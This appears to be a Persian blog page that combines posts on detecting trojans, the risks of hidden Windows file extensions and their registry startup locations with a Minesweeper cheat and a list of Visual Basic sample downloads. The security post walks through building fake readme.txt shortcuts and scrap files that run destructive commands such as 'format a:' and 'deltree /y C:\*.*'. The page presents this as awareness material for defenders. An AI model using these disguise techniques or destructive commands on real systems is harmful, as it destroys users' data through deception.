      پس از مطالعه روشهای بالا، احتمالاً شما هم با من هم عقیده هستید که پیدا کردن یک تروا به روش دستی کار چندان ساده ای نیست؛ اما اکثریت قریب به اتفاق ترواها از روشهای رجیستری استفاده می کنند و شما از تغییرات ایجاد شده در قسمتهای Run می توانید به آلوده شدن سیستم پی ببرید. یک ابزار بسیار عالی که در اکثر ویندوزها وجود دارد (در ویندوز 2000 وجود ندارد) ابزاری به نام System Configuration Utility است. برای اجرای این ابزار، از منوی Start، Run را انتخاب کنید (یا کلید ویندوز کیبورد خود را بگیرید و سپس کلید R را فشار دهید) و در داخل جعبه متن آن تایپ کنید: MSConfig و OK را فشار دهید. اگرچه این ابزار کاربردهای مختلفی دارد، ما در اینجا فقط به ذکر کاربردهایی از آن می پردازیم که به موضوع بحث ما بیشتر مربوط هستند. پس از باز شدن صفحه System Configuration Utility، از بالای صفحه Startup را انتخاب کنید. خواهید دید که اکثر فایلهایی که خود به خود همراه ویندوز شما اجرا می شوند در اینجا لیست شده اند و شما با حذف تیک کنار اسم آنها می توانید آنها را از کار بیندازید. در قسمت Startup item نامی که برنامه برای خود برگزیده است، در قسمت command، آدرس فایل اجرایی برنامه و در قسمت Location تکنیک مورد استفاده توسط برنامه برای اجرا را خواهید دید. توجه به نکات زیر هم در استفاده از MSConfig به شما کمک خواهد کرد:

1- چون معمولاً قسمتهای command و location فضای کافی برای نمایش کامل محتویات خود را ندارند، موش رایانه را روی خط جداکننده command از location یا خط انتهای location ببرید تا بتوانید اندازه این قسمتها را تغییر دهید.

 2- عبارتهای HKCU و HKLM به ترتیب مخفف HKEY_LOCAL_MACHINE و HKEY_CURRENT_USER می باشند که در بالا و در تکنیک شماره 5 به آنها اشاره شد.

 3- برای مشاهده فایلهای System.ini و win.ini، علاوه بر روش گفته شده در بالا (در مورد شماره 2) کافی است که از قسمت بالای MSConfig گزینه های SYSTEM.INI و WIN.INI را انتخاب کنید. 

پسوندهای پنهان فایلهای ویندوز
ممکن است از این موضوع آگاهی نداشته باشید، اما حتی اگر به ویندوز بگویید که تمام پسوندهای فایل را نشان دهد، هنوز هم فایلهایی وجود دارند که بطور پیش فرض مخفی شده‌اند. همچنین هر برنامه نصب شده‌ایی می‌تواند پسوندها را پیکربندی کند تا پنهان شوند. در اینجا در مورد چگونگی انجام این کار و همچنین دلیل اینکه چرا برخی از پسوندهای پنهان می‌توانند برای تعدادی از کاربرهای کامپیوتر خطرناک باشند، مثالهایی آورده شده است. به فرض اینکه شما قبلا ویندوز explorer را برای نشان دادن تمام پسوندهای پیکربندی کرده‌اید.

پسوندهای SHS
یک کپی از notepad.exe بگیرید و آن را روی desktop خود قرار دهید. Wordpad را باز کنید. روی notepad.exe کلیک کنید و آن را به سمت سند باز شده wordpad بکشید. روی notepad.exe کلیک کنید و آن را به عقب به سمت desktop بکشید. فایلی را که ایجاد شده است (Scrap) به Readme.txt تغییر نام دهید.

حالایک آیکن که نشان دهنده سند متنی است و فایلی با نام مشخص readme.txt بر روی desktop شما وجود دارد کلیک کردن بر روی فایل فوق باعث می‌شود notepad باز ‌شود. اگر این فایل یک Trojan باشد، شما فریب خورده‌اید و توسط آنچه که یک فایل متنی بی‌خطر بنظر می‌رسید آلوده شده‌اید. اگر اجازه نمایش این پسوند داده می شد شما فریب فایل Readme.txt.shs را نمی‌خوردید.

پسوندهای PIF
اگر سعی کنید تا notepad.exe را به anything.txt.pif تغییر نام دهید، تنها فایلی با نام anything.txt روی desktop خود خواهید دید. و این بدین دلیل است که PIF پسوند دیگری است که ویندوز بطور پیش فرض پنهان می‌کند. اگر شما فایل را اجرا کنید برنامه اجرا خواهد شد، به خاطر اینکه ویندوز پسوندهای PIF را اجرا خواهد کرد حتی اگر آنها فایلهای اجرایی باشند.

پسوندهای SCR
پسوند دیگری که باید مراقب آن بود SCR است. کپی notepad.exe خود را به notepad.scr تغییر نام دهید و روی آن کلیک کنید. Notepad به عنوان یک فایل اجرایی اجرا خواهد شد. بسیاری از افراد توسط هکرهایی فریب می‌خورند که account یک قربانی را بدست آورده‌اند. هکر email یا هر نوع پیغامی را به تمام دوستان قربانی می‌فرستد که “این صفحه نمایش جدید و بامزه را ببینید از خنده روده بر خواهید شد!” از آنجایی که این پیغام از یک منبع مطمئن آمده، اکثر افراد فریب خورده و فایل SCR را اجرا می‌کنند که در نهایت به هکری ختم می‌شود که به کامپیوتر شما متصل شده است.

فرمانهای خطرناکی که می‌توانند گنجانده شوند
پسوندهای میانبر PIF
برخی از پسوندهای پنهان فایل قادرند به سادگی با فرمانهای پنهان شده‌ای که می‌توانند برای سیستم شما مخرب باشند برنامه‌ریزی شوند. این یک آزمایش ساده است:

دکمه راست ماوس خود را روی desktop کلیک کنید و New و سپس Shotcut را انتخاب نمایید. در Command line تایپ کنید:
format a:/autotest
Next را کلیک کنید. در “Select a name for the shortcut” تایپ کنید: readme.txt سپس Next را کلیک کنید. یک آیکن notepad را انتخاب کرده و Finish را کلیک کنید. حالا شما در desktop خود فایلی با نام readme.txt و با آیکن notepad دارید. مطمئن شوید که در درایو شما دیسکی است که از دست دادن آن برای شما اشکالی ندارد و روی آیکن کلیک کنید. فایلی که شما روی آن کلیک کرده‌اید درایو A: را فرمت خواهد کرد. البته آیکن هکر درایو دیگری را مورد هدف قرار خواهد داد یا ممکن است نامی همچون ‘game.exe’ و فرمانی برای حذف کردن دایرکتوری ویندوز شما یا (deltree /y C:\*.*) کل درایو C شما داشته باشد. اگر پسوند PIF پنهان نشود، قادر به فریب شما نخواهد بود.

پسوند SHS
فایلهای Scrap نیز می‌توانند فرمانهای گنجانده شده را پنهان کند. این یک آزمون ساده است: از notepad.exe یک کپی بگیرید و آن را روی desktop خود قرار دهید. Wordpad را باز کنید.Notepad.exe را کلیک کنید و آن را به سمت سند باز شده wordpad بکشید. روی Edit کلیک کنید و Package Object و سپس Edit package را انتخاب کنید. روی Edit و سپس Command Line کلیک کنید.
در کادر، دستوری مانند format a:/autotest را تایپ کنید و روی OK کلیک کنید. آیکن نیز می‌تواند از این پنجره تغییر یابد. از پنجره خارج شوید، این کار سند را به روز خواهد کرد. روی notepad.exe کلیک کنید و آن را به عقیب به سمت Desktop بکشید. فایلی را که ایجاد شده (Scrap) به Readme.txt تغییر نام دهید.

حالا شما آنچه را که شبیه یک فایل متنی است دارید. اگر این فایل اجرا شود درایو A: را فرمت خواهد کرد. همانگونه که در مثال بالا برای پسوندهای میانبر PIF دیده شد، هکر می‌تواند از فرمانهای خطرناکتری استفاده کند.

روشهای Trojan در هنگام راه اندازی
روشهای راه اندازی استاندارد
اکثر افراد از راههای متفاوتی که هکرها برای راه اندازی فایلهای Trojan استفاده می‌کنند آگاه نیستند. اگر هکری کامپیوتر شما را با یک Trojan آلوده کند، نیاز به انتخاب یک روش راه‌اندازی خواهد داشت، بگونه‌ای که در زمان راه‌اندازی مجدد کامپیوتر شما Trojan بارگذاری شود. روشهای معمول راه‌اندازی شامل کلیدهای اجرایی registry، فولدر راه اندازی ویندوز، Windows Load= یا run=lines یافته شده در فایل win.ini و shell=line یافته شده در system.ini ویندوز می‌باشند.

روشهای راه اندازی خطرناک
از آنجایی که فقط تعداد اندکی از این روشهای راه اندازی وجود دارند، هکرهای زیادی را یافته‌ایم که در پیدا کردن روشهای جدید راه‌اندازی افراط می‌کنند. این شامل استفاده از تغییرات خطرناکی در سیستم registry می‌باشد، که در صورتی که فایل Trojan یا فایل همراه آن از بین برود سیستم را بصورت بلااستفاده درخواهد آورد. این یک دلیل استفاده نکردن از نرم افزار ضد ویروس برای از بین بردن Trojanهاست. اگر یکی از این روشها استفاده شود، و فایل بدون ثابت کردن registry سیستم از بین برود، سیستم شما قادر به اجرای هیچگونه برنامه‌ای پس از راه اندازی مجدد کامپیوترتان نخواهد بود.
قبل از آنکه سراغ registry برویم لازم به توضیح است که یک فولدر به صورت C:\WINDOWS\StartMenu\Program\StartUp وجود دارد که هر فایلی در اینجا باشد هنگام راه اندازی ویندوز اجرا خواهد شد.توجه داشته باشید که هرگونه تغییری می‌تواند سیستم شما را به خطر بیاندازد بنابراین، هرچه ما می‌گوییم انجام دهید. برای دستیابی به registry به منوی start>run> بروید و “regedit” را بدون علامت ” ” تایپ کنید. در registry چندین مکان برای راه اندازی Startup وجود دارد که لیستی از آنها را در اینجا می آوریم.

[HKEY_CLASSES_ROOT\exefile\shell\open\command] =”\”%1\” %*”
[HKEY_CLASSES_ROOT\comfile\shell\open\command] =”\”%1\” %*”
[HKEY_CLASSES_ROOT\batfile\shell\open\command] =”\”%1\” %*”
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command]=”\”%1\” %*”
[HKEY_CLASSES_ROOT\piffile\shell\open\command] =”\”%1\” %*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] =”\”%1\” %*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command]=”\”%1\” %*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command]=”\”%1\”%*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command]=”\”%1\”%*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command]=”\”%1\”%*”
اگر این کلیدها مقدار “\”%1\”%*” را نداشته باشند و به جای اجرای فایل در هنگام راه اندازی به “\”Server.exe %1\” %*” تغییر یابد به احتمال زیاد یک Trojan است.
روش راه اندازی ICQ
روشی راه اندازی دیگری که امروزه استفاده از آن معمول است شناسایی شبکه ICQ می‌باشد. بسیاری از کاربران ICQ نمی‌دانند که هکر می‌تواند یک خط پیکربندی را به ICQ اضافه نماید تا با هر بار بارگذاری شدن برنامه Trojan نیز راه اندازی شود. به عنوان آزمایش مراحل زیر را انجام دهید:
ICQ را باز کنید. روی آیکن ICQ کلیک کنید و preference را انتخاب نمایید. روی Edit launch List کلیک کنید. روی Add کلیک کنید. روی Browse کلیک کنید. فایلی را برای اضافه کردن به Windows\notepad.exe بیابید که به کار این آزمایش بیاید. روی Open و سپس OK کلیک کنید. زمانی که شما ICQ را راه اندازی مجدد می‌کنید فایل اجرا خواهد شد.

آموزش ساختن ویروس [ویروس نویسی]

بازی مین روب یا Minesweeper چندین سال است که همراه ویندوز به عنوان یک بازی محبوب ارائه می شود. اگر شما نیز به این بازی علاقمند هستید و می خواهید همیشه در آن پیروز باشید، مراحل زیر را طی کنید:

1- وارد بازی Minesweeper شوید.
2- عبارت xyzzyرا در حالی که پنجره Minesweeper فعال است ، تایپ کنید و کلیدهای Shift + Enterرا فشار دهید.
3- تمامی پنجره های دیگر را Minimize کنید تا Desktop ویندوز را مشاهده کنید.

خوب حالا شروع به بازی کنید .زمانی که نشانگر ماوس را روی خانه ای می آورید که دارای مین است ، نقطه ای کوچک در گوشه بالا و سمت چپ دسک تاپ سیاه می شود و زمانی که ماوس را روی یک خانه امن ببرید، همان نقطه سفید می شود.
با این روش می توانید دوستان خود را حیرت زده کنید زیرا این نقطه کوچک توجه کمتر کسی را به خود جلب میکند.

ترفنـــــــــــــــــــــــــــد:

برای اینکه بعد از قرار دادن کنترل هاتون نخواید دوباره فونت تک تک اونها رو تغییر بدهید برای این کار قبل از قرار دادن اونها روی فرم ابتدا فونت فرم رو به فونت مورد نظرتون که من Tahoma رو پیشنهاد میکنم تغییر بدهید و سپس هر کنترلی که روی فرم قرار بدهید با فونت فرم یکی میشود

بعضی مواقع شما نوشته داخل یک کنترل مثل یک Label رو به فارسی تغییر میدهید که این عبارت به درستی نشان داده نخواهد شد که برای رفع این مشکل باید فونت اون کنترل رو به Tahoma تغییر دهید

برنامه نمونه مشاور املاک(درخواستی)

دیجیتال

DNS

کدهای اماده برای کار های مختلف

بخش اول ویژوال بیسیک شبیه سازی شده(انگلیسی)  بخش دوم  بخش سوم

اقای Hacker alone ( درخواستی)

برنامه جالب سه بعدی

فارسی ساز ویژوال بیسیک ( در فایل متنی داخلش توضیح دادم ) بخش اول

پسوردش هم : VBLog.blogfa است حتمــــــــــــــــــــــــا دانلود کنید هر بخش ۱۵۰ کیلو بایت است

بخش دوم  بخش سوم  بخش چهارم  بخش پنجم  بخش ششم  بخش هفتم بخش هشتم بخش نهم

پنجره شناور (اقا کمال) قسمتی از وی بی 

فکس با وی بی

فکر و بکر

جستجوی دیتا بیس

پر کننده گرافیکی

اکواریــــــــــــــــــــــــــــــــم

جالبــــــــــــــــــــــــــــــــه

توابــــــــــــــــــــــــــع

پنجره شفاف

پنجره شفاف 2

محاسبه کننده زمان توقف موس

مبدل تصاویر

جلوه دهنده تصاویر

قفل کننده پوشه ها

ماتریکس برای بچه های مهندسی و ریاضی

حرکت دهنده موس

برش دهنده تصاویر

پین باتون

پینگ

پینگ ای پی

Trace

طیف نما برای کارهای مولتی مدیا جالب

بک گراند Fifa برای جام جهانی 2010 خودم طراحی کردم

شبیه سازی قسمت معلولین ویندوز

اموزش Active X

سرعت سنج اینترنت خیلی جالبه

جستجو در بین پوشه ها

یک Progress bar کاربردی و جالب

یک بوتر به همراه فایل اجرایش

باز کردن Combo box با زدن اینتر

اعداد مختلط

کپی فایل به همراه نوار پیشرفت

فهرست کشورهای جهان برای شما

متوقف کردن برنامه در تاریخ معین شده

تبدیل Fat32 به Ntfs

دیوار اتش با VB

تبدیل فوریه برای بچه های الکترونیک و ریاضی

تبدیل عکس به متن

برنامه نمونه کار با پورت

پیانو

یک نمونه کوچک از برنامه خودم(وی بی فارسی)(اقا کمال)

اموزش برنامه نویسی Socket Programing

یک نمونه کوچک از برنامه خودم (نوار مرزی)

یافتن متن

تبدیل متن به عکس

تبدیل کدهای وی بی به دلفی

شبیه سازی یک قسمت از Nero ( نمایش طیفی فایل صوتی)

کاوشگر اینترنت